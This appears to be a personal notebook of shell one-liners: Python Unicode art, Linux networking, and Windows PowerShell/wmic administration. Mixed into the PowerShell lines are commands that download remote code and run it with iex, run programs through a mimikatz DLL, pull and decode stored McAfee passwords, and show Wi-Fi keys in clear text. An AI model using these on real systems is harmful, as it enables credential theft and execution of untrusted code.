# ASCII Art # Unicode heartception print("\n".join(["".join([chr(9825+4*((min([(i-6)**2+(j-u)**2 for u in[25,35]])<30)|(i>7)&(abs(j-30)<19-i)))for j in range(60)])for i in range(20)])) # Sierpinksi « emoji sierpinski python3 twitter-sized one-liner » z=range(32);print("\n".join([" ".join(["\x1b[3"+str((x^y)%10)+"m"+chr(0x1f300+(x**y%1140))if(x|y==x+y)else" "for x in z])for y in z])) # 4chan stuff c=64;print("\n".join([("{:^"+str(c)+"s}").format("".join([chr(0x0fd5)if(x|y==x+y)else" "for x in range(c)]).strip())for y in range(c-1,-1,-2)])) # Gradients import math;print("\n".join(["".join([" -·~c»¤¢XM¶"[int(2.5*(2+math.sin(j/4)+math.sin(i/2)))] for j in range(99)])for i in range(30)])) # UNIX stuff get eth0 address ip addr show|grep eth0|grep inet|sed -e 's/ *inet *//g' -e 's/\/.*//g' ip link add name X type bridge ip link set X up ip set eth0 master X ip set eth1 master X THE TCP SOCKETS ARE IN /proc/net/tcp ! iptables -t nat -A PREROUTING -i eth0 -p tcp -m tcp -m multiport ! --dports 22,53,80,443 -j REDIRECT --to-port 80 # Using high codepoints to compress data : cat file.dat | xz | python3 -c 'import sys;a=sys.stdin.buffer.read();sys.stdout.write("".join([chr(0x10000+256*a[i]+a[i+1]) for i in range(0,len(a) - (len(a)%2),2)]))' > file.xz.utf8.txt cat file.xz.utf8.txt | python3 -c 'import sys;a=sys.stdin.read();sys.stdout.buffer.write(bytes([i for c in a for i in [(ord(c)>>8)&0xff,ord(c)&0xff]]))' | xz -d > file.dat # Generate an usable oui.txt #!/bin/bash { awk '/(base 16)/ {print $1,substr($0,25)}' /var/lib/ieee-data/oui.txt awk '/hex/ {gsub("-","",$1);printf $1;getline;print substr($1,1,1),substr($0,30)}' /var/lib/ieee-data/mam.txt awk '/hex/ {gsub("-","",$1);printf $1;getline;print substr($1,1,3),substr($0,30)}' /var/lib/ieee-data/oui36.txt awk '/hex/ {gsub("-","",$1);printf $1;getline;print substr($1,1,3),substr($0,27)}' /var/lib/ieee-data/iab.txt } | sort # Powershell stuff # Add DejaVu to cmd.exe fonts (New-Object System.Drawing.Text.InstalledFontCollection).Families Get-ItemProperty "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont" Set-ItemProperty "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont" -name 000 -value "DejaVu Sans Mono" # List proxy info Get-ItemProperty "HKCU:\software\Microsoft\Windows\CurrentVersion\Internet Settings\" Get-ItemProperty "HKCU:\software\Microsoft\Windows\CurrentVersion\Internet Settings\" "AutoConfigURL" Get-ItemProperty "HKCU:\software\Microsoft\Windows\CurrentVersion\Internet Settings\" "ProxyServer" Get-ChildItem -recurse 'HKCU:\software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\' | % { $_.GetValue("WpadDetectedURL") } | sort -Unique # List LAN info, renew DHCP wmic nicconfig where ipenabled=true call /? wmic nicconfig where ipenabled=true call RenewDHCPLease wmic nicconfig where ipenabled=true call ReleaseDHCPLease wmic nicconfig where ipenabled=true list brief wmic nicconfig where ipenabled=true get ipaddress,macaddress,dnsserversearchorder,dnshostname,defaultipgateway,dhcpserver,description /format:list wmic nicconfig where ipenabled=true list full # Enumerate the "properties" of files, as shown by the Microsoft Windows "Shell" explorer.exe $shell=New-Object -ComObject Shell.Application $shell.namespace("$(pwd)").items() | % { $z=$_; 0..260 | %{ New-Object psobject -Property @{id=$_;value=$shell.namespace("$(pwd)").getDetailsOf($z,$_) } | Where-Object { $_.value -ne "" } } } # This field is used on windows10 to set some network types (eth/wlan/wwan) as costly. Modifying it can prevent automatic windows updates. (= no updates on 4G by default). Useful if you have a small bandwidth. The key is no accessible as it is owned by some nt-authority stuff. Need to fix it. get-item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\DefaultMediaCost\" # Ping the subnet $ping = New-Object System.Net.Networkinformation.Ping 1..254 | % { $ping.send("192.168.100.$_") | select address, status } for ( $i = 0; $i -le 256 ; $i++ ) { ping 192.168.0.$i } # Get help on a python module py -3 -m pydoc struct # Show powershell version $psversiontable # Play with the audio api of windows :D (New-Object –ComObject SAPI.SPVoice).Speak("Hello wurld") # Run an arbitrary program with mimikatz dll rundll32 c:\path\mimilib.dll,start d:\otherpath\a.exe # Show saved credentials by one of the Windows credentials manager rundll32 keymgr.dll,KRShowKeyMgr # Take a screenshot after 5s (See "TakeScreenshot.ps1" on heyscriptguy tech blog cmd /c "timeout /T 5 & %windir%\system32\SnippingTool.exe" # Golden github https://github.com/cure53/HTTPLeaks # Extract an archive without "Expand-Archive" Add-Type -A System.IO.Compression.FileSystem;[IO.Compression.ZipFile]::ExtractToDirectory(src,dst) # Download a file to stdout (iwr does not work everywhere) iwr -useb http://xn--mric-bpa.fr/x.php (New-Object System.Net.WebClient).DownloadData("ftp://user:pass@localhost/a") $a = @(for ($i=1;$i -le 5; $i++) { [System.Net.DNS]::GetHostAddresses("ns${i}.domain.net") | % { $_.ipaddresstostring } }) $a.DownloadString("http://xn--mric-bpa.fr/") $a=$( Get-ChildItem -recurse ) $a=(New-Object System.Net.Client) $a=(New-Object System.Net.WebClient) $env:OS $env:PUBLIC $env:windir $psversiontable $s="12150F10111C1A060A1F1B1817160519"; 0..(($s.Length/2)-1) | % { [byte]::parse($s.Substring(2*($_),2),[System.Globalization.NumberStyles]::HexNumber) } & 'C:\Program Files (x86)\PDFtk\bin\pdftk.exe' .\a.pdf cat output b.pdf compress & 'C:\Program Files (x86)\PDFtk\bin\pdftk.exe' .\c.pdf cat output d.pdf compress & 'C:\Program Files (x86)\PDFtk\bin\pdftk.exe' .\c.pdf cat output d.pdf uncompress & 'C:\Program Files (x86)\PDFtk\bin\pdftk.exe' .\d.pdf cat output e.pdf compress & 'C:\opt\bin\exiftool(-k).exe' * (New-Object -ComObject SAPI.SPVoice).Speak("Hello wurld") (New-Object System.Net.WebClient).DownloadString("http://xn--mric-bpa.fr/oneliners.txt") ([System.Security.Cryptography.SHA1]::Create()).ComputeHash([System.Text.Encoding]::UTF8.GetBytes("")) ([xml]$(Get-Content 'C:\ProgramData\McAfee\Common Framework\SiteList.xml')).SelectNodes("//Password").innertext | Get-Unique ([xml]$(Get-Content 'C:\ProgramData\McAfee\Common Framework\SiteList.xml')).SelectNodes("//Password").innertext | Get-Unique | % { [System.Convert]::FromBase64String($_) } Compress-Archive --help Expand-Archive .\lsass.zip Get-ADComputer -filter { ipv4address -eq "10.0.0.1" } Get-ADComputer -filter { name -like "somehostname" } Get-ADComputer hostname Get-ADComputer hostname -properties * Get-ADComputer hostname -properties * | Export-Csv hostname.csv Get-ADComputer mqlkjfmozeifskjfnmlzkf Get-ADUser -filter { objectsid -equals "S-1-5-21-somesid" } Get-ADUser login -properties * | select * Get-ADUser login -properties * | select objectsid Get-Acl Get-ChildItem Get-ChildItem Get-ChildItem 'Cert:\CurrentUser\McAfee Trust\' Get-ChildItem 'Cert:\CurrentUser\Trust' Get-ChildItem 'Cert:\CurrentUser\TrustedPeople\' Get-ChildItem 'Cert:\CurrentUser\TrustedPeople\' | select * Get-ChildItem 'Cert:\CurrentUser\TrustedPublisher\' Get-ChildItem -Recurse Get-ChildItem -Recurse -Filter "*py" Get-ChildItem -Recurse -Filter "*py" | % { Select-String "a server" $_.FullName } Get-ChildItem -Recurse -Filter "*py" | % { Select-String "server" $_.FullName } Get-ChildItem -Recurse -Filter "*py" | select * Get-ChildItem -Recurse -Filter "*py" | select * | head Get-ChildItem -Recurse -Filter "*py" | select * | vim - Get-ChildItem -Recurse -Filter "*py" | select fullname Get-ChildItem -Recurse -Filter "*py" | select fullname | % { Select-String "server" $_ } Get-ChildItem -Recurse -Filter "*py" | select fullname | % { Select-String "server" -path $_ } Get-ChildItem -Recurse -Filter "*py" | select fullname | Select-String Get-ChildItem -Recurse -Filter "*py" | select fullname | Select-String "server" $_ Get-ChildItem -Recurse -Filter "*py" | select fullpath Get-ChildItem -Recurse -Filter "*py" | select name Get-ChildItem -Recurse -Filter "*py" | select path Get-ChildItem -Recurse -Filter { name -like "*py" } Get-ChildItem -Recurse -filter { name -like "*.py" } Get-ChildItem -recurse Get-ChildItem -recurse Get-ChildItem -recurse -Filter { FullName -equals "*txt" } Get-ChildItem -recurse -Filter { FullName -like "txt" } Get-ChildItem -recurse -Filter { FullName -like * } Get-ChildItem -recurse -Filter { name -like "*txt" } Get-ChildItem -recurse -Filter { name -like * } Get-ChildItem -recurse -Filter { name -like *.txt } Get-ChildItem -recurse -Filter { name -like *txt } Get-ChildItem -recurse -depth 2 Get-ChildItem -recurse -depth 2 -properties * | % { New-Object psobject -property @(path=$_.fullname;time_c=$_.CreationTime) } Get-ChildItem -recurse -depth 2 | % { $_.fullname; $_.CreationTime ; $_.lastwritetime; $_.lastaccesstime } Get-ChildItem -recurse -depth 2 | % { $_.fullname; $_.CreationTime ; $_.lastwritetime; $_.lastaccesstime } | Export-Csv 'C:\test\a.csv' Get-ChildItem -recurse -include *txt,*bat | select fullname Get-ChildItem -recurse ps* -include *.msu,*exe | select fullname Get-ChildItem cert:\CurrentUser\ Get-Content .\data.bin -encoding Byte | foreach { [convert]::ToChar($( $_ -bxor ( 0x42 - $_.readcount ) )) } Get-NetworkSwitchEthernetPort Get-PSReadlineKeyHandler Import-Csv .\somefile.csv | select sourceaddress,sourcezonename,sourceprocessname | Group-Object -AsHashTable -AsString Import-Csv .\somefile.csv | select sourceaddress,sourcezonename,sourceprocessname | Sort-Object Import-Csv .\somefile.csv | select sourceaddress,sourcezonename,sourceprocessname | Sort-Object -Property sourceaddress Import-Csv .\somefile.csv | select sourceaddress,sourcezonename,sourceprocessname | Sort-Object -Property sourceaddress Import-Csv .\somefile.csv | select sourceaddress,sourcezonename,sourceprocessname | Sort-Object -Property sourceaddress |Get-Unique -OnType Select-String function_decode .\evil.txt | % { $data=$_.line.split('"')[1];$key=$_.line.split('"')[3]; echo [$data,$key]} [Convert]::FromBase64String($data) [Convert]::FromBase64String([System.Text.Encoding]::ASCII.GetBytes($data)) [Convert]::FromBase64String([System.Text.Encoding]::ASCII.GetBytes($data+"=")) [Convert]::FromBase64String([System.Text.Encoding]::ASCII.GetBytes($data+"==")) [Convert]::ToBase64String($bytes) [Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($data)) [Syste.Byte]::Parse("aa",[System.Globalization.NumberStyles]::HexNumber) [System.BitConverter]::ToString($(Get-Content .\data.bin -encoding Byte)) [System.BitConverter]::ToString(([System.Security.Cryptography.MD5]::Create()).ComputeHash([System.Text.Encoding]::UTF8.GetBytes(""))) [System.BitConverter]::ToString(([System.Security.Cryptography.SHA1]::Create()).ComputeHash([System.Text.Encoding]::UTF8.GetBytes(""))) [System.BitConverter]::ToString(Get-Content .\data.bin -encoding Byte) [System.BitConverter]::ToString([System.Security.Cryptography.MD5CryptoServiceProvider]::new().ComputeHash([System.Text.UTF8Encoding]::new().GetBytes(""))) [System.Bitconverter]::ToString(([System.Security.Cryptography.SHA1]::Create()).ComputeHash([System.Text.Encoding]::UTF8.GetBytes(""))) [System.Byte]::Parse("3") [System.Byte]::Parse("aa") [System.Byte]::Parse(33) [System.Convert]::ToByte("0xaa") [System.Convert]::ToByte("a") [System.Convert]::ToByte("aa") [System.Convert]::ToByte(23) [System.Net.DNS]::GetHostAddresses("x.fr") | select ipaddresstostring [System.Net.DNS]::GetHostName("8.8.8.8") [System.Net.Dns]::GetHostAddresses("google.com") [System.Net.Dns]::GetHostAddresses("thepiratebay.se") [System.Net.Dns]::GetHostByAddress("10.0.0.1") [System.Net.Dns]::Resolve("google.com") [System.Net.Dns]::Resolve("google.com",true) [System.Net.NetworkInformation.NetworkInterface]::GetAllNetworkInterfaces() [System.Net.NetworkInformation.NetworkInterface]::GetIsNetworkAvailable() [System.Security.Cryptography.MD5CryptoServiceProvider]::new().ComputeHash([System.Text.UTF8Encoding]::new().GetBytes("")) [System.Text.Encoding]::ASCII.GetBytes($data) [System.Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($data)) [System.Text.Encoding]::GetEncoding("cp437") [System.Text.Encoding]::GetEncoding("cp437").GetString(140) [System.Text.Encoding]::GetEncoding("cp437").GetString(42) [System.Text.Encoding]::GetEncoding("cp437").GetString(44) [System.Text.Encoding]::GetEncoding("hex") [System.Text.Encoding]::GetEncoding("windows-cp437") [System.Text.Encoding]::GetEncodings() [System.Text.Encoding]::Unicode.GetBytes($data) [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($data)) [xml]$(Get-Content 'C:\ProgramData\McAfee\Common Framework\SiteList.xml').SelectNodes("//*Password") et-ChildItem cert:\CurrentUser get-aduser -filter { mail -like "user@host.tld" } get-aduser -filter { mail -like "user@host.tld" } -properties * hdwwiz.cpl iex -useb http://xn--mric-bpa.fr/x.php iex http://xn--mric-bpa.fr/x.php ipconfig /release ipconfig /renew iwr -usb http://xn--mric-bpa.fr/x.php iwr -useb http://xn--mric-bpa.fr/x.php netsh wlan delete profile name="BotConf2016" netsh wlan dump netsh wlan show profiles key=clear name="BotConf2016" netsh wlan show profiles name="BotConf2016" key=clear netsh wlan show settings py -3 -c "import time;print(time.strftime('%Y-%m-%d %H:%M:%S %z'))" py -3 -m ftplib -d localhost -l -p -l py -3 -m http.server 80 --cgi rundll32 keymgr.dll,KRShowKeyMgr type .\evil.txt | iex type C:\test\b.txt | Measure-Object | select lines wmic nicconfig list brief wmic /? wmic baseboard list wmic bios get serialnumber wmic bios list full wmic computersystem get Manufacturer wmic computersystem list brief wmic cpu get decription wmic cpu get decription,name wmic cpu list brief wmic cpu list decription,name wmic cpu list full wmic desktop list brief wmic desktopmonitor list wmic desktopmonitor list brief wmic display wmic nic list wmic nic list brief wmic nic where deviceid=27 list full wmic nicconfig wmic nicconfig list wmic nicconfig list brief wmic nicconfig list brief where dhcpenabled=true wmic nicconfig list btier wmic nicconfig list full wmic nicconfig list full | vim - wmic nicconfig where "dhcpenabled=true and ipenabled=true" list /format:list wmic nicconfig where "dhcpenabled=true and ipenabled=true" list brief wmic nicconfig where "dhcpenabled=true and ipenabled=true" list brief wmic nicconfig where "dhcpenabled=true and ipenabled=true" list brief /format:list wmic nicconfig where "dhcpenabled=true and ipenabled=true" list full /format:list wmic nicconfig where "ipenabled=true and dhcpenabled=true" call ReleaseDHCPLease wmic nicconfig where "ipenabled=true and dhcpenabled=true" call RenewDHCPLease wmic nicconfig where "ipenabled=true and dhcpenabled=true" get ipaddress,defaultipgateway,description,dhcpserver wmic nicconfig where "ipenabled=true and dhcpenabled=true" get ipaddress,defaultipgateway,description,dhcpserver,macaddress,dnsserversearchorder wmic nicconfig where "ipenabled=true and dhcpenabled=true" get ipaddress,defaultipgateway,description,dhcpserver,macaddress,dnsserversearchorder /format:list wmic nicconfig where "ipenabled=true and dhcpenabled=true" list brief wmic nicconfig where "ipenabled=true and dhcpenabled=true" list full wmic nicconfig where "ipenabled=true and dhcpeneblaed=true" /? wmic nicconfig where "ipenabled=true" list brief wmic nicconfig where "ipenabled=true" list full wmic nicconfig where dhcpenabled=true wmic nicconfig where dhcpenabled=true list brief wmic nicconfig where dhcpenabled=true list full wmic nicconfig where index=11 list full wmic nicconfig where ipenabled=true list brief wmic nicconfig where ipenabled=true list brief /format:list wmic os list brief wmic product list brief wmic sysdriver list wmic sysdriver list brief %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -Exec Bypass -Command "whoami" /cygdrive/c/Program\ Files/Wireshark/tshark.exe -r ${i} -Eseparator=, -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport -e _ws.col.Protocol -e _ws.col.info # SCAN IMAGES ON WINDOWS WITHOUT SHITTY BINARIES AND ONLY THE DEFAULT APIS DAMN MICROSOFT (New-Object -ComObject WIA.DeviceManager).DeviceInfos.Item(1).Connect().Items(1).Transfer().SaveFile("$(pwd)\scan.bmp") # Same stuff with a popup menu offering some options and parameterss (New-Object -ComObject WIA.CommonDialog).ShowAcquireImage().SaveFile("$(pwd)\testx.bmp") mmc devmgmt.msc # Windows native popup :D https://twitter.com/TekDefense/status/823204388982362118 wlrmdr.exe -s 60000 -f 1 -t "text" -m "more text" -a o # print a list of "${ip} ${port1},${port2},${port3}" from a list of "${ip} ${port}" sort -V ip.port.open.txt | awk '{t[$1]=t[$1]","$2} END {for (k in t) {gsub(/^,/,"",t[k]);print k,t[k]}}' |sort -V | column -t $cn=0; Get-ChildItem -filter *.pcap | % { & 'C:\Program Files\Wireshark\tshark.exe' -r $_.fullname -Y 'ssl.handshake.certificate' -T fields -e ssl.handshake.certificate } | % { $x=$_;Set-Content -value ($x.split(":") | % { [Byte]::Parse($_,[System.Globalization.NumberStyles]::HexNumber) }) -encoding byte -path "CERT_${cn}.der" ; $cn += 1;} calendar alias cal='ncal -M -b -A6 -B2'